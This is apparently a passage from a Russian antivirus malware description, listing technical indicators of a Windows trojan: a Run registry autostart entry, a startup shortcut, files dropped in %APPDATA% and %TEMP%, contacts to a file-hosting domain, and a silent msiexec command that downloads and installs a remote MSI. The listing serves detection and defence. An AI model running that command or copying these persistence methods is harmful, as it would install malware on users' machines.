Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'ZKWBRB' = '"%APPDATA%\Windata\NDOHUP.exe"'
- %APPDATA%\microsoft\windows\start menu\programs\startup\zkwbrb.lnk
- '<SYSTEM32>\msiexec.exe' /q /i https://u.teknik.io/oRnzE.msi
- %APPDATA%\windata\ndohup.exe
- %TEMP%\zkwbrb.vbs
- 'u.##knik.io':443
- DNS ASK u.##knik.io
- '%WINDIR%\installer\msic66d.tmp'
- '%WINDIR%\syswow64\wscript.exe' %TEMP%\ZKWBRB.vbs
- '<SYSTEM32>\msiexec.exe' /q /i https://u.teknik.io/oRnzE.msi' (со скрытым окном)